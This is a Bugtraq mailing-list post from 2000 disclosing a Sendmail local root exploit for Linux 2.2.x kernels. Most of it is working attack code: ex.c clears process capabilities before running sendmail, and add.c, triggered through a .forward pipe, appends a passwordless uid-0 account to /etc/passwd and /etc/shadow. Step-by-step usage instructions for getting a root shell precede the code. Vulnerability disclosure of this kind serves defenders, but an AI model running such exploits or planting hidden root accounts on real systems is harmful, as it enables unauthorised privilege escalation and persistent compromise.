[15250] in bugtraq
Sendmail local root exploit on linux 2.2.x
daemon@ATHENA.MIT.EDU (Florian Heinz)
Thu Jun 8 13:45:12 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------C5AA82A7D9E47C75A576FD13"
Message-Id: <393F8FDC.882BAEE5@real-linux.de>
Date: Thu, 8 Jun 2000 14:21:48 +0200
Reply-To: Florian Heinz <sky@REAL-LINUX.DE>
From: Florian Heinz <sky@REAL-LINUX.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------C5AA82A7D9E47C75A576FD13
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hello all,
Attached is a file with 2 sources, ex.c and add.c
compile these 2 and create a file "mail":
From: yomama@foobar.com
To: localuser@localdomain.com
Subject: foo
bar
.
then create a .forward with:
|/path/to/add
then just do: ./ex < mail
this should add a user yomama with uid/gid = 0 and without a password
set
a simple su - yomama should give you root.
This exploit was written by me in a hurry, I hope there are no mistakes
Greets
Florian Heinz
--------------C5AA82A7D9E47C75A576FD13
Content-Type: text/plain; charset=us-ascii;
name="exploit.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="exploit.c"
-- snip -- ex.c --
#include <linux/capability.h>
int main (void) {
cap_user_header_t header;
cap_user_data_t data;
header = malloc(8);
data = malloc(12);
header->pid = 0;
header->version = _LINUX_CAPABILITY_VERSION;
data->inheritable = data->effective = data->permitted = 0;
capset(header, data);
execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
}
-- snap -- ex.c --
-- snip -- add.c --
#include <fcntl.h>
int main (void) {
int fd;
char string[40];
seteuid(0);
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
strcpy(string, "yomama::11029:0:99999:7:::");
write(fd, string, strlen(string));
close(fd);
}
-- snap -- add.c --
--------------C5AA82A7D9E47C75A576FD13--
